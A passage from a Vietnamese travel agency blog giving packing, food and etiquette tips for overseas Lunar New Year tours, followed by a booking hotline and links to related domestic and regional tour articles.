Bạn nên có sự tìm hiểu trước khi chuyến tour Tết nước ngoài 2024 bắt đầu. Một số đất nước vào khoảng thời gian Tết Quý Mão vẫn còn đang trong giữa mùa đông nên thời tiết tại đây sẽ vô cùng khắc nghiệt. Hãy chuẩn bị cho bạn những bộ trang phục phù hợp như áo bông, mũ khăn len, găng tay,… để không bị cảm lạnh. 

tour tet nuoc ngoai 2023 - trang phuc

Chuẩn bị trang phục phù hợp khi đi tour Tết nước ngoài 2024. Nguồn: Sưu tầm

Hơn nữa, tới một đất nước xa lạ, bạn có thể không hợp khẩu vị với những món ăn địa phương. Hãy hỏi trước người quản lý tour để biết rõ về những món ăn bạn sẽ được trải nghiệm. Trong trường hợp bạn thấy cần thiết, hãy mang thêm đồ ăn tiện lợi như mì gói để dự phòng. Ngoài ra bạn cũng nên tìm hiểu trước về phong tục, văn hóa của đất nước đó để tránh gặp phải rắc rối.

Bài viết trên đây dideden.com gợi ý cho bạn một vài điểm đến du xuân Quý Mão được nhiều du khách yêu thích. Nếu bạn vẫn còn băn khoăn chưa biết nên đi tour Tết nước ngoài 2024 tại đâu, liên hệ ngay 1900 3398 để được hỗ trợ tư vấn nhanh nhất.

ĐĂNG KÍ ĐẶT TOUR DU LỊCH NƯỚC NGOÀI

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]